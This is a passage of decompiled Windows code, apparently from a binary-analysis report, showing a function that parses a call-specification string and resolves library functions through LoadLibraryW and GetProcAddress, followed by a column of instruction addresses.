                                                                                      				WCHAR* _t217;
                                                                                      				void* _t225;
                                                                                      				struct HINSTANCE__* _t226;
                                                                                      				struct HINSTANCE__* _t227;
                                                                                      				struct HINSTANCE__* _t229;
                                                                                      				signed short _t231;
                                                                                      				struct HINSTANCE__* _t234;
                                                                                      				struct HINSTANCE__* _t236;
                                                                                      				void* _t237;
                                                                                      				intOrPtr* _t238;
                                                                                      				void* _t249;
                                                                                      				signed char _t250;
                                                                                      				signed int _t251;
                                                                                      				void* _t255;
                                                                                      				struct HINSTANCE__* _t257;
                                                                                      				void* _t258;
                                                                                      				signed int _t260;
                                                                                      				signed int _t261;
                                                                                      				signed short* _t264;
                                                                                      				signed int _t269;
                                                                                      				signed int _t272;
                                                                                      				signed int _t274;
                                                                                      				void* _t277;
                                                                                      				void* _t281;
                                                                                      				struct HINSTANCE__* _t283;
                                                                                      				signed int _t286;
                                                                                      				void _t287;
                                                                                      				signed int _t288;
                                                                                      				signed int _t300;
                                                                                      				signed int _t301;
                                                                                      				signed short _t304;
                                                                                      				void* _t305;
                                                                                      				signed int _t309;
                                                                                      				signed int _t312;
                                                                                      				signed int _t315;
                                                                                      				signed int _t316;
                                                                                      				signed int _t317;
                                                                                      				signed short* _t321;
                                                                                      				WCHAR* _t322;
                                                                                      				WCHAR* _t324;
                                                                                      				WCHAR* _t325;
                                                                                      				struct HINSTANCE__* _t326;
                                                                                      				void* _t328;
                                                                                      				signed int _t331;
                                                                                      				void* _t332;
                                                                                      
                                                                                      				_t283 = 0;
                                                                                      				_v32 = 0;
                                                                                      				_v36 = 0;
                                                                                      				_v16 = 0;
                                                                                      				_v8 = 0;
                                                                                      				_v40 = 0;
                                                                                      				_t332 = 0;
                                                                                      				_v52 = 0;
                                                                                      				_v44 = 0;
                                                                                      				_t208 = E715D12BB();
                                                                                      				_v24 = _t208;
                                                                                      				_v28 = _t208;
                                                                                      				_v48 = E715D12BB();
                                                                                      				_t321 = E715D12E3();
                                                                                      				_v56 = _t321;
                                                                                      				_v12 = _t321;
                                                                                      				while(1) {
                                                                                      					_t211 = _v32;
                                                                                      					_v60 = _t211;
                                                                                      					if(_t211 != _t283 && _t332 == _t283) {
                                                                                      						break;
                                                                                      					}
                                                                                      					_t286 =  *_t321 & 0x0000ffff;
                                                                                      					_t213 = _t286 - _t283;
                                                                                      					if(_t213 == 0) {
                                                                                      						_t37 =  &_v32;
                                                                                      						 *_t37 = _v32 | 0xffffffff;
                                                                                      						__eflags =  *_t37;
                                                                                      						L20:
                                                                                      						_t215 = _v60 - _t283;
                                                                                      						if(_t215 == 0) {
                                                                                      							__eflags = _t332 - _t283;
                                                                                      							 *_v28 = _t283;
                                                                                      							if(_t332 == _t283) {
                                                                                      								_t255 = GlobalAlloc(0x40, 0x1ca4); // executed
                                                                                      								_t332 = _t255;
                                                                                      								 *(_t332 + 0x1010) = _t283;
                                                                                      								 *(_t332 + 0x1014) = _t283;
                                                                                      							}
                                                                                      							_t287 = _v36;
                                                                                      							_t47 = _t332 + 8; // 0x8
                                                                                      							_t217 = _t47;
                                                                                      							_t48 = _t332 + 0x808; // 0x808
                                                                                      							_t322 = _t48;
                                                                                      							 *_t332 = _t287;
                                                                                      							_t288 = _t287 - _t283;
                                                                                      							__eflags = _t288;
                                                                                      							 *_t217 = _t283;
                                                                                      							 *_t322 = _t283;
                                                                                      							 *(_t332 + 0x1008) = _t283;
                                                                                      							 *(_t332 + 0x100c) = _t283;
                                                                                      							 *(_t332 + 4) = _t283;
                                                                                      							if(_t288 == 0) {
                                                                                      								__eflags = _v28 - _v24;
                                                                                      								if(_v28 == _v24) {
                                                                                      									goto L42;
                                                                                      								}
                                                                                      								_t328 = 0;
                                                                                      								GlobalFree(_t332);
                                                                                      								_t332 = E715D13B1(_v24);
                                                                                      								__eflags = _t332 - _t283;
                                                                                      								if(_t332 == _t283) {
                                                                                      									goto L42;
                                                                                      								} else {
                                                                                      									goto L35;
                                                                                      								}
                                                                                      								while(1) {
                                                                                      									L35:
                                                                                      									_t249 =  *(_t332 + 0x1ca0);
                                                                                      									__eflags = _t249 - _t283;
                                                                                      									if(_t249 == _t283) {
                                                                                      										break;
                                                                                      									}
                                                                                      									_t328 = _t332;
                                                                                      									_t332 = _t249;
                                                                                      									__eflags = _t332 - _t283;
                                                                                      									if(_t332 != _t283) {
                                                                                      										continue;
                                                                                      									}
                                                                                      									break;
                                                                                      								}
                                                                                      								__eflags = _t328 - _t283;
                                                                                      								if(_t328 != _t283) {
                                                                                      									 *(_t328 + 0x1ca0) = _t283;
                                                                                      								}
                                                                                      								_t250 =  *(_t332 + 0x1010);
                                                                                      								__eflags = _t250 & 0x00000008;
                                                                                      								if((_t250 & 0x00000008) == 0) {
                                                                                      									_t251 = _t250 | 0x00000002;
                                                                                      									__eflags = _t251;
                                                                                      									 *(_t332 + 0x1010) = _t251;
                                                                                      								} else {
                                                                                      									_t332 = E715D162F(_t332);
                                                                                      									 *(_t332 + 0x1010) =  *(_t332 + 0x1010) & 0xfffffff5;
                                                                                      								}
                                                                                      								goto L42;
                                                                                      							} else {
                                                                                      								_t300 = _t288 - 1;
                                                                                      								__eflags = _t300;
                                                                                      								if(_t300 == 0) {
                                                                                      									L31:
                                                                                      									lstrcpyW(_t217, _v48);
                                                                                      									L32:
                                                                                      									lstrcpyW(_t322, _v24);
                                                                                      									goto L42;
                                                                                      								}
                                                                                      								_t301 = _t300 - 1;
                                                                                      								__eflags = _t301;
                                                                                      								if(_t301 == 0) {
                                                                                      									goto L32;
                                                                                      								}
                                                                                      								__eflags = _t301 != 1;
                                                                                      								if(_t301 != 1) {
                                                                                      									goto L42;
                                                                                      								}
                                                                                      								goto L31;
                                                                                      							}
                                                                                      						} else {
                                                                                      							if(_t215 == 1) {
                                                                                      								_t257 = _v16;
                                                                                      								if(_v40 == _t283) {
                                                                                      									_t257 = _t257 - 1;
                                                                                      								}
                                                                                      								 *(_t332 + 0x1014) = _t257;
                                                                                      							}
                                                                                      							L42:
                                                                                      							_v12 = _v12 + 2;
                                                                                      							_v28 = _v24;
                                                                                      							L59:
                                                                                      							if(_v32 != 0xffffffff) {
                                                                                      								_t321 = _v12;
                                                                                      								continue;
                                                                                      							}
                                                                                      							break;
                                                                                      						}
                                                                                      					}
                                                                                      					_t258 = _t213 - 0x23;
                                                                                      					if(_t258 == 0) {
                                                                                      						__eflags = _t321 - _v56;
                                                                                      						if(_t321 <= _v56) {
                                                                                      							L17:
                                                                                      							__eflags = _v44 - _t283;
                                                                                      							if(_v44 != _t283) {
                                                                                      								L43:
                                                                                      								_t260 = _v32 - _t283;
                                                                                      								__eflags = _t260;
                                                                                      								if(_t260 == 0) {
                                                                                      									_t261 = _t286;
                                                                                      									while(1) {
                                                                                      										__eflags = _t261 - 0x22;
                                                                                      										if(_t261 != 0x22) {
                                                                                      											break;
                                                                                      										}
                                                                                      										_t321 =  &(_t321[1]);
                                                                                      										__eflags = _v44 - _t283;
                                                                                      										_v12 = _t321;
                                                                                      										if(_v44 == _t283) {
                                                                                      											_v44 = 1;
                                                                                      											L162:
                                                                                      											_v28 =  &(_v28[0]);
                                                                                      											 *_v28 =  *_t321;
                                                                                      											L58:
                                                                                      											_t331 =  &(_t321[1]);
                                                                                      											__eflags = _t331;
                                                                                      											_v12 = _t331;
                                                                                      											goto L59;
                                                                                      										}
                                                                                      										_t261 =  *_t321 & 0x0000ffff;
                                                                                      										_v44 = _t283;
                                                                                      									}
                                                                                      									__eflags = _t261 - 0x2a;
                                                                                      									if(_t261 == 0x2a) {
                                                                                      										_v36 = 2;
                                                                                      										L57:
                                                                                      										_t321 = _v12;
                                                                                      										_v28 = _v24;
                                                                                      										_t283 = 0;
                                                                                      										__eflags = 0;
                                                                                      										goto L58;
                                                                                      									}
                                                                                      									__eflags = _t261 - 0x2d;
                                                                                      									if(_t261 == 0x2d) {
                                                                                      										L151:
                                                                                      										_t304 =  *_t321;
                                                                                      										__eflags = _t304 - 0x2d;
                                                                                      										if(_t304 != 0x2d) {
                                                                                      											L154:
                                                                                      											_t264 =  &(_t321[1]);
                                                                                      											__eflags =  *_t264 - 0x3a;
                                                                                      											if( *_t264 != 0x3a) {
                                                                                      												goto L162;
                                                                                      											}
                                                                                      											__eflags = _t304 - 0x2d;
                                                                                      											if(_t304 == 0x2d) {
                                                                                      												goto L162;
                                                                                      											}
                                                                                      											_v36 = 1;
                                                                                      											L157:
                                                                                      											_v12 = _t264;
                                                                                      											__eflags = _v28 - _v24;
                                                                                      											if(_v28 <= _v24) {
                                                                                      												 *_v48 = _t283;
                                                                                      											} else {
                                                                                      												 *_v28 = _t283;
                                                                                      												lstrcpyW(_v48, _v24);
                                                                                      											}
                                                                                      											goto L57;
                                                                                      										}
                                                                                      										_t264 =  &(_t321[1]);
                                                                                      										__eflags =  *_t264 - 0x3e;
                                                                                      										if( *_t264 != 0x3e) {
                                                                                      											goto L154;
                                                                                      										}
                                                                                      										_v36 = 3;
                                                                                      										goto L157;
                                                                                      									}
                                                                                      									__eflags = _t261 - 0x3a;
                                                                                      									if(_t261 != 0x3a) {
                                                                                      										goto L162;
                                                                                      									}
                                                                                      									goto L151;
                                                                                      								}
                                                                                      								_t269 = _t260 - 1;
                                                                                      								__eflags = _t269;
                                                                                      								if(_t269 == 0) {
                                                                                      									L80:
                                                                                      									_t305 = _t286 + 0xffffffde;
                                                                                      									__eflags = _t305 - 0x55;
                                                                                      									if(_t305 > 0x55) {
                                                                                      										goto L57;
                                                                                      									}
                                                                                      									switch( *((intOrPtr*)(( *(_t305 + 0x715d23e8) & 0x000000ff) * 4 +  &M715D235C))) {
                                                                                      										case 0:
                                                                                      											__ecx = _v24;
                                                                                      											__edi = _v12;
                                                                                      											while(1) {
                                                                                      												__edi = __edi + 1;
                                                                                      												__edi = __edi + 1;
                                                                                      												_v12 = __edi;
                                                                                      												__ax =  *__edi;
                                                                                      												__eflags = __ax - __dx;
                                                                                      												if(__ax != __dx) {
                                                                                      													goto L132;
                                                                                      												}
                                                                                      												L131:
                                                                                      												__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
                                                                                      												if( *((intOrPtr*)(__edi + 2)) != __dx) {
                                                                                      													L136:
                                                                                      													 *__ecx =  *__ecx & 0x00000000;
                                                                                      													__eax = E715D12CC(_v24);
                                                                                      													__ebx = __eax;
                                                                                      													goto L97;
                                                                                      												}
                                                                                      												L132:
                                                                                      												__eflags = __ax;
                                                                                      												if(__ax == 0) {
                                                                                      													goto L136;
                                                                                      												}
                                                                                      												__eflags = __ax - __dx;
                                                                                      												if(__ax == __dx) {
                                                                                      													__edi = __edi + 1;
                                                                                      													__edi = __edi + 1;
                                                                                      													__eflags = __edi;
                                                                                      												}
                                                                                      												__ax =  *__edi;
                                                                                      												 *__ecx =  *__edi;
                                                                                      												__ecx = __ecx + 1;
                                                                                      												__ecx = __ecx + 1;
                                                                                      												__edi = __edi + 1;
                                                                                      												__edi = __edi + 1;
                                                                                      												_v12 = __edi;
                                                                                      												__ax =  *__edi;
                                                                                      												__eflags = __ax - __dx;
                                                                                      												if(__ax != __dx) {
                                                                                      													goto L132;
                                                                                      												}
                                                                                      												goto L131;
                                                                                      											}
                                                                                      										case 1:
                                                                                      											_v8 = 1;
                                                                                      											goto L57;
                                                                                      										case 2:
                                                                                      											_v8 = _v8 | 0xffffffff;
                                                                                      											goto L57;
                                                                                      										case 3:
                                                                                      											_v8 = _v8 & 0x00000000;
                                                                                      											_v20 = _v20 & 0x00000000;
                                                                                      											_v16 = _v16 + 1;
                                                                                      											goto L85;
                                                                                      										case 4:
                                                                                      											__eflags = _v20;
                                                                                      											if(_v20 != 0) {
                                                                                      												goto L57;
                                                                                      											}
                                                                                      											_v12 = _v12 - 2;
                                                                                      											__ebx = E715D12BB();
                                                                                      											 &_v12 = E715D1B86( &_v12);
                                                                                      											__eax = E715D1510(__edx, __eax, __edx, __ebx);
                                                                                      											goto L97;
                                                                                      										case 5:
                                                                                      											L105:
                                                                                      											_v20 = _v20 + 1;
                                                                                      											goto L57;
                                                                                      										case 6:
                                                                                      											_push(7);
                                                                                      											goto L123;
                                                                                      										case 7:
                                                                                      											_push(0x19);
                                                                                      											goto L143;
                                                                                      										case 8:
                                                                                      											__eax = 0;
                                                                                      											__eax = 1;
                                                                                      											__eflags = 1;
                                                                                      											goto L107;
                                                                                      										case 9:
                                                                                      											_push(0x15);
                                                                                      											goto L143;
                                                                                      										case 0xa:
                                                                                      											_push(0x16);
                                                                                      											goto L143;
                                                                                      										case 0xb:
                                                                                      											_push(0x18);
                                                                                      											goto L143;
                                                                                      										case 0xc:
                                                                                      											__eax = 0;
                                                                                      											__eax = 1;
                                                                                      											__eflags = 1;
                                                                                      											goto L118;
                                                                                      										case 0xd:
                                                                                      											__eax = 0;
                                                                                      											__eax = 1;
                                                                                      											__eflags = 1;
                                                                                      											goto L109;
                                                                                      										case 0xe:
                                                                                      											__eax = 0;
                                                                                      											__eax = 1;
                                                                                      											__eflags = 1;
                                                                                      											goto L111;
                                                                                      										case 0xf:
                                                                                      											__eax = 0;
                                                                                      											__eax = 1;
                                                                                      											__eflags = 1;
                                                                                      											goto L122;
                                                                                      										case 0x10:
                                                                                      											__eax = 0;
                                                                                      											__eax = 1;
                                                                                      											__eflags = 1;
                                                                                      											goto L113;
                                                                                      										case 0x11:
                                                                                      											_push(3);
                                                                                      											goto L123;
                                                                                      										case 0x12:
                                                                                      											_push(0x17);
                                                                                      											L143:
                                                                                      											_pop(__ebx);
                                                                                      											goto L98;
                                                                                      										case 0x13:
                                                                                      											__eax =  &_v12;
                                                                                      											__eax = E715D1B86( &_v12);
                                                                                      											__ebx = __eax;
                                                                                      											__ebx = __eax + 1;
                                                                                      											__eflags = __ebx - 0xb;
                                                                                      											if(__ebx < 0xb) {
                                                                                      												__ebx = __ebx + 0xa;
                                                                                      											}
                                                                                      											goto L97;
                                                                                      										case 0x14:
                                                                                      											__ebx = 0xffffffff;
                                                                                      											goto L98;
                                                                                      										case 0x15:
                                                                                      											__eax = 0;
                                                                                      											__eax = 1;
                                                                                      											__eflags = 1;
                                                                                      											goto L116;
                                                                                      										case 0x16:
                                                                                      											__ecx = 0;
                                                                                      											__eflags = 0;
                                                                                      											goto L91;
                                                                                      										case 0x17:
                                                                                      											__eax = 0;
                                                                                      											__eax = 1;
                                                                                      											__eflags = 1;
                                                                                      											goto L120;
                                                                                      										case 0x18:
                                                                                      											_t271 =  *(_t332 + 0x1014);
                                                                                      											__eflags = _t271 - _v16;
                                                                                      											if(_t271 > _v16) {
                                                                                      												_v16 = _t271;
                                                                                      											}
                                                                                      											_v8 = _v8 & 0x00000000;
                                                                                      											_v20 = _v20 & 0x00000000;
                                                                                      											_v36 - 3 = _t271 - (_v36 == 3);
                                                                                      											if(_t271 != _v36 == 3) {
                                                                                      												L85:
                                                                                      												_v40 = 1;
                                                                                      											}
                                                                                      											goto L57;
                                                                                      										case 0x19:
                                                                                      											L107:
                                                                                      											__ecx = 0;
                                                                                      											_v8 = 2;
                                                                                      											__ecx = 1;
                                                                                      											goto L91;
                                                                                      										case 0x1a:
                                                                                      											L118:
                                                                                      											_push(5);
                                                                                      											goto L123;
                                                                                      										case 0x1b:
                                                                                      											L109:
                                                                                      											__ecx = 0;
                                                                                      											_v8 = 3;
                                                                                      											__ecx = 1;
                                                                                      											goto L91;
                                                                                      										case 0x1c:
                                                                                      											L111:
                                                                                      											__ecx = 0;
                                                                                      											__ecx = 1;
                                                                                      											goto L91;
                                                                                      										case 0x1d:
                                                                                      											L122:
                                                                                      											_push(6);
                                                                                      											goto L123;
                                                                                      										case 0x1e:
                                                                                      											L113:
                                                                                      											_push(2);
                                                                                      											goto L123;
                                                                                      										case 0x1f:
                                                                                      											__eax =  &_v12;
                                                                                      											__eax = E715D1B86( &_v12);
                                                                                      											__ebx = __eax;
                                                                                      											__ebx = __eax + 1;
                                                                                      											goto L97;
                                                                                      										case 0x20:
                                                                                      											L116:
                                                                                      											_v52 = _v52 + 1;
                                                                                      											_push(4);
                                                                                      											_pop(__ecx);
                                                                                      											goto L91;
                                                                                      										case 0x21:
                                                                                      											L120:
                                                                                      											_push(4);
                                                                                      											L123:
                                                                                      											_pop(__ecx);
                                                                                      											L91:
                                                                                      											__edi = _v16;
                                                                                      											__edx =  *(0x715d405c + __ecx * 4);
                                                                                      											__eax =  ~__eax;
                                                                                      											asm("sbb eax, eax");
                                                                                      											_v40 = 1;
                                                                                      											__edi = _v16 << 5;
                                                                                      											__eax = __eax & 0x00008000;
                                                                                      											__edi = (_v16 << 5) + __esi;
                                                                                      											__eax = __eax | __ecx;
                                                                                      											__eflags = _v8;
                                                                                      											 *(__edi + 0x1018) = __eax;
                                                                                      											if(_v8 < 0) {
                                                                                      												L93:
                                                                                      												__edx = 0;
                                                                                      												__edx = 1;
                                                                                      												__eflags = 1;
                                                                                      												L94:
                                                                                      												__eflags = _v8 - 1;
                                                                                      												 *(__edi + 0x1028) = __edx;
                                                                                      												if(_v8 == 1) {
                                                                                      													__eax =  &_v12;
                                                                                      													__eax = E715D1B86( &_v12);
                                                                                      													__eax = __eax + 1;
                                                                                      													__eflags = __eax;
                                                                                      													_v8 = __eax;
                                                                                      												}
                                                                                      												__eax = _v8;
                                                                                      												 *((intOrPtr*)(__edi + 0x101c)) = _v8;
                                                                                      												_t136 = _v16 + 0x81; // 0x81
                                                                                      												_t136 = _t136 << 5;
                                                                                      												__eax = 0;
                                                                                      												__eflags = 0;
                                                                                      												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
                                                                                      												 *((intOrPtr*)(__edi + 0x1030)) = 0;
                                                                                      												 *((intOrPtr*)(__edi + 0x102c)) = 0;
                                                                                      												L97:
                                                                                      												__eflags = __ebx;
                                                                                      												if(__ebx == 0) {
                                                                                      													goto L57;
                                                                                      												}
                                                                                      												L98:
                                                                                      												__eflags = _v20;
                                                                                      												_v40 = 1;
                                                                                      												if(_v20 != 0) {
                                                                                      													L103:
                                                                                      													__eflags = _v20 - 1;
                                                                                      													if(_v20 == 1) {
                                                                                      														__eax = _v16;
                                                                                      														__eax = _v16 << 5;
                                                                                      														__eflags = __eax;
                                                                                      														 *(__eax + __esi + 0x102c) = __ebx;
                                                                                      													}
                                                                                      													goto L105;
                                                                                      												}
                                                                                      												_v16 = _v16 << 5;
                                                                                      												_t144 = __esi + 0x1030; // 0x1030
                                                                                      												__edi = (_v16 << 5) + _t144;
                                                                                      												__eax =  *__edi;
                                                                                      												__eflags = __eax - 0xffffffff;
                                                                                      												if(__eax <= 0xffffffff) {
                                                                                      													L101:
                                                                                      													__eax = GlobalFree(__eax);
                                                                                      													L102:
                                                                                      													 *__edi = __ebx;
                                                                                      													goto L103;
                                                                                      												}
                                                                                      												__eflags = __eax - 0x19;
                                                                                      												if(__eax <= 0x19) {
                                                                                      													goto L102;
                                                                                      												}
                                                                                      												goto L101;
                                                                                      											}
                                                                                      											__eflags = __edx;
                                                                                      											if(__edx > 0) {
                                                                                      												goto L94;
                                                                                      											}
                                                                                      											goto L93;
                                                                                      										case 0x22:
                                                                                      											goto L57;
                                                                                      									}
                                                                                      								}
                                                                                      								_t272 = _t269 - 1;
                                                                                      								__eflags = _t272;
                                                                                      								if(_t272 == 0) {
                                                                                      									_v16 = _t283;
                                                                                      									goto L80;
                                                                                      								}
                                                                                      								__eflags = _t272 != 1;
                                                                                      								if(_t272 != 1) {
                                                                                      									goto L162;
                                                                                      								}
                                                                                      								__eflags = _t286 - 0x6e;
                                                                                      								if(__eflags > 0) {
                                                                                      									_t309 = _t286 - 0x72;
                                                                                      									__eflags = _t309;
                                                                                      									if(_t309 == 0) {
                                                                                      										_push(4);
                                                                                      										L74:
                                                                                      										_pop(_t274);
                                                                                      										L75:
                                                                                      										__eflags = _v8 - 1;
                                                                                      										if(_v8 != 1) {
                                                                                      											_t96 = _t332 + 0x1010;
                                                                                      											 *_t96 =  *(_t332 + 0x1010) &  !_t274;
                                                                                      											__eflags =  *_t96;
                                                                                      										} else {
                                                                                      											 *(_t332 + 0x1010) =  *(_t332 + 0x1010) | _t274;
                                                                                      										}
                                                                                      										_v8 = 1;
                                                                                      										goto L57;
                                                                                      									}
                                                                                      									_t312 = _t309 - 1;
                                                                                      									__eflags = _t312;
                                                                                      									if(_t312 == 0) {
                                                                                      										_push(0x10);
                                                                                      										goto L74;
                                                                                      									}
                                                                                      									__eflags = _t312 != 0;
                                                                                      									if(_t312 != 0) {
                                                                                      										goto L57;
                                                                                      									}
                                                                                      									_push(0x40);
                                                                                      									goto L74;
                                                                                      								}
                                                                                      								if(__eflags == 0) {
                                                                                      									_push(8);
                                                                                      									goto L74;
                                                                                      								}
                                                                                      								_t315 = _t286 - 0x21;
                                                                                      								__eflags = _t315;
                                                                                      								if(_t315 == 0) {
                                                                                      									_v8 =  ~_v8;
                                                                                      									goto L57;
                                                                                      								}
                                                                                      								_t316 = _t315 - 0x11;
                                                                                      								__eflags = _t316;
                                                                                      								if(_t316 == 0) {
                                                                                      									_t274 = 0x100;
                                                                                      									goto L75;
                                                                                      								}
                                                                                      								_t317 = _t316 - 0x31;
                                                                                      								__eflags = _t317;
                                                                                      								if(_t317 == 0) {
                                                                                      									_t274 = 1;
                                                                                      									goto L75;
                                                                                      								}
                                                                                      								__eflags = _t317 != 0;
                                                                                      								if(_t317 != 0) {
                                                                                      									goto L57;
                                                                                      								}
                                                                                      								_push(0x20);
                                                                                      								goto L74;
                                                                                      							} else {
                                                                                      								_v32 = _t283;
                                                                                      								_v36 = _t283;
                                                                                      								goto L20;
                                                                                      							}
                                                                                      						}
                                                                                      						__eflags =  *((short*)(_t321 - 2)) - 0x3a;
                                                                                      						if( *((short*)(_t321 - 2)) != 0x3a) {
                                                                                      							goto L17;
                                                                                      						}
                                                                                      						__eflags = _v32 - _t283;
                                                                                      						if(_v32 == _t283) {
                                                                                      							goto L43;
                                                                                      						}
                                                                                      						goto L17;
                                                                                      					}
                                                                                      					_t277 = _t258 - 5;
                                                                                      					if(_t277 == 0) {
                                                                                      						__eflags = _v44 - _t283;
                                                                                      						if(_v44 != _t283) {
                                                                                      							goto L43;
                                                                                      						} else {
                                                                                      							__eflags = _v36 - 3;
                                                                                      							_v32 = 1;
                                                                                      							_v8 = _t283;
                                                                                      							_v20 = _t283;
                                                                                      							_v16 = (0 | _v36 == 0x00000003) + 1;
                                                                                      							_v40 = _t283;
                                                                                      							goto L20;
                                                                                      						}
                                                                                      					}
                                                                                      					_t281 = _t277 - 1;
                                                                                      					if(_t281 == 0) {
                                                                                      						__eflags = _v44 - _t283;
                                                                                      						if(_v44 != _t283) {
                                                                                      							goto L43;
                                                                                      						} else {
                                                                                      							_v32 = 2;
                                                                                      							_v8 = _t283;
                                                                                      							_v20 = _t283;
                                                                                      							goto L20;
                                                                                      						}
                                                                                      					}
                                                                                      					if(_t281 != 0x16) {
                                                                                      						goto L43;
                                                                                      					} else {
                                                                                      						_v32 = 3;
                                                                                      						_v8 = 1;
                                                                                      						goto L20;
                                                                                      					}
                                                                                      				}
                                                                                      				GlobalFree(_v56);
                                                                                      				GlobalFree(_v24);
                                                                                      				GlobalFree(_v48);
                                                                                      				if(_t332 == _t283 ||  *(_t332 + 0x100c) != _t283) {
                                                                                      					L182:
                                                                                      					return _t332;
                                                                                      				} else {
                                                                                      					_t225 =  *_t332 - 1;
                                                                                      					if(_t225 == 0) {
                                                                                      						_t187 = _t332 + 8; // 0x8
                                                                                      						_t324 = _t187;
                                                                                      						__eflags =  *_t324 - _t283;
                                                                                      						if( *_t324 != _t283) {
                                                                                      							_t226 = GetModuleHandleW(_t324);
                                                                                      							__eflags = _t226 - _t283;
                                                                                      							 *(_t332 + 0x1008) = _t226;
                                                                                      							if(_t226 != _t283) {
                                                                                      								L171:
                                                                                      								_t192 = _t332 + 0x808; // 0x808
                                                                                      								_t325 = _t192;
                                                                                      								_t227 = E715D16BD( *(_t332 + 0x1008), _t325);
                                                                                      								__eflags = _t227 - _t283;
                                                                                      								 *(_t332 + 0x100c) = _t227;
                                                                                      								if(_t227 == _t283) {
                                                                                      									__eflags =  *_t325 - 0x23;
                                                                                      									if( *_t325 == 0x23) {
                                                                                      										_t195 = _t332 + 0x80a; // 0x80a
                                                                                      										_t231 = E715D13B1(_t195);
                                                                                      										__eflags = _t231 - _t283;
                                                                                      										if(_t231 != _t283) {
                                                                                      											__eflags = _t231 & 0xffff0000;
                                                                                      											if((_t231 & 0xffff0000) == 0) {
                                                                                      												 *(_t332 + 0x100c) = GetProcAddress( *(_t332 + 0x1008), _t231 & 0x0000ffff);
                                                                                      											}
                                                                                      										}
                                                                                      									}
                                                                                      								}
                                                                                      								__eflags = _v52 - _t283;
                                                                                      								if(_v52 != _t283) {
                                                                                      									L178:
                                                                                      									_t325[lstrlenW(_t325)] = 0x57;
                                                                                      									_t229 = E715D16BD( *(_t332 + 0x1008), _t325);
                                                                                      									__eflags = _t229 - _t283;
                                                                                      									if(_t229 != _t283) {
                                                                                      										L166:
                                                                                      										 *(_t332 + 0x100c) = _t229;
                                                                                      										goto L182;
                                                                                      									}
                                                                                      									__eflags =  *(_t332 + 0x100c) - _t283;
                                                                                      									L180:
                                                                                      									if(__eflags != 0) {
                                                                                      										goto L182;
                                                                                      									}
                                                                                      									L181:
                                                                                      									_t206 = _t332 + 4;
                                                                                      									 *_t206 =  *(_t332 + 4) | 0xffffffff;
                                                                                      									__eflags =  *_t206;
                                                                                      									goto L182;
                                                                                      								} else {
                                                                                      									__eflags =  *(_t332 + 0x100c) - _t283;
                                                                                      									if( *(_t332 + 0x100c) != _t283) {
                                                                                      										goto L182;
                                                                                      									}
                                                                                      									goto L178;
                                                                                      								}
                                                                                      							}
                                                                                      							_t234 = LoadLibraryW(_t324);
                                                                                      							__eflags = _t234 - _t283;
                                                                                      							 *(_t332 + 0x1008) = _t234;
                                                                                      							if(_t234 == _t283) {
                                                                                      								goto L181;
                                                                                      							}
                                                                                      							goto L171;
                                                                                      						}
                                                                                      						_t188 = _t332 + 0x808; // 0x808
                                                                                      						_t236 = E715D13B1(_t188);
                                                                                      						 *(_t332 + 0x100c) = _t236;
                                                                                      						__eflags = _t236 - _t283;
                                                                                      						goto L180;
                                                                                      					}
                                                                                      					_t237 = _t225 - 1;
                                                                                      					if(_t237 == 0) {
                                                                                      						_t185 = _t332 + 0x808; // 0x808
                                                                                      						_t238 = _t185;
                                                                                      						__eflags =  *_t238 - _t283;
                                                                                      						if( *_t238 == _t283) {
                                                                                      							goto L182;
                                                                                      						}
                                                                                      						_t229 = E715D13B1(_t238);
                                                                                      						L165:
                                                                                      						goto L166;
                                                                                      					}
                                                                                      					if(_t237 != 1) {
                                                                                      						goto L182;
                                                                                      					}
                                                                                      					_t81 = _t332 + 8; // 0x8
                                                                                      					_t284 = _t81;
                                                                                      					_t326 = E715D13B1(_t81);
                                                                                      					 *(_t332 + 0x1008) = _t326;
                                                                                      					if(_t326 == 0) {
                                                                                      						goto L181;
                                                                                      					}
                                                                                      					 *(_t332 + 0x104c) =  *(_t332 + 0x104c) & 0x00000000;
                                                                                      					 *((intOrPtr*)(_t332 + 0x1050)) = E715D12CC(_t284);
                                                                                      					 *(_t332 + 0x103c) =  *(_t332 + 0x103c) & 0x00000000;
                                                                                      					 *((intOrPtr*)(_t332 + 0x1048)) = 1;
                                                                                      					 *((intOrPtr*)(_t332 + 0x1038)) = 1;
                                                                                      					_t90 = _t332 + 0x808; // 0x808
                                                                                      					_t229 =  *(_t326->i + E715D13B1(_t90) * 4);
                                                                                      					goto L165;
                                                                                      				}
                                                                                      			}


































































                                                                                      0x715d1c07
                                                                                      0x715d1c0a
                                                                                      0x715d1c0d
                                                                                      0x715d1c10
                                                                                      0x715d1c13
                                                                                      0x715d1c16
                                                                                      0x715d1c19
                                                                                      0x715d1c1b
                                                                                      0x715d1c1e
                                                                                      0x715d1c21
                                                                                      0x715d1c26
                                                                                      0x715d1c29
                                                                                      0x715d1c31
                                                                                      0x715d1c39
                                                                                      0x715d1c3b
                                                                                      0x715d1c3e
                                                                                      0x715d1c46
                                                                                      0x715d1c46
                                                                                      0x715d1c4b
                                                                                      0x715d1c4e
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d1c5b
                                                                                      0x715d1c60
                                                                                      0x715d1c62
                                                                                      0x715d1cf4
                                                                                      0x715d1cf4
                                                                                      0x715d1cf4
                                                                                      0x715d1cf8
                                                                                      0x715d1cfb
                                                                                      0x715d1cfd
                                                                                      0x715d1d1f
                                                                                      0x715d1d21
                                                                                      0x715d1d24
                                                                                      0x715d1d2d
                                                                                      0x715d1d33
                                                                                      0x715d1d35
                                                                                      0x715d1d3b
                                                                                      0x715d1d3b
                                                                                      0x715d1d41
                                                                                      0x715d1d44
                                                                                      0x715d1d44
                                                                                      0x715d1d47
                                                                                      0x715d1d47
                                                                                      0x715d1d4d
                                                                                      0x715d1d4f
                                                                                      0x715d1d4f
                                                                                      0x715d1d51
                                                                                      0x715d1d54
                                                                                      0x715d1d57
                                                                                      0x715d1d5d
                                                                                      0x715d1d63
                                                                                      0x715d1d66
                                                                                      0x715d1d8a
                                                                                      0x715d1d8d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d1d90
                                                                                      0x715d1d92
                                                                                      0x715d1da0
                                                                                      0x715d1da3
                                                                                      0x715d1da5
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d1da7
                                                                                      0x715d1da7
                                                                                      0x715d1da7
                                                                                      0x715d1dad
                                                                                      0x715d1daf
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d1db1
                                                                                      0x715d1db3
                                                                                      0x715d1db5
                                                                                      0x715d1db7
